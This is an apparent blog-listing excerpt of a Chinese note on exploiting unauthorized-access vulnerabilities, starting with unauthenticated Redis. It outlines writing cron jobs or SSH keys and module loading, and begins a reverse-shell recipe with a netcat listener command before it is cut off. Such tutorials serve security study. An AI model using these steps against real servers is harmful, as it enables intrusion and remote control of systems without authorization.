常见未授权漏洞及利用方式 1. Redis 未授权访问(默认端口 6379) 漏洞特征 默认无密码验证,允许匿名登录; 4.x/5.0.5 前版本支持通过主从复制加载恶意模块执行命令; 高权限运行时可写入系统文件(如计划任务、SSH 密钥)。 利用方式 计划任务反弹 Shell # 本地监听端口 nc -lvp 4444 # 连接目标Redis并写入任务 redis-c… lang 朗 | 2024-12-11 14:37 | 818 | 0 | 笔记 1691 字 | 8 分钟 未授权漏洞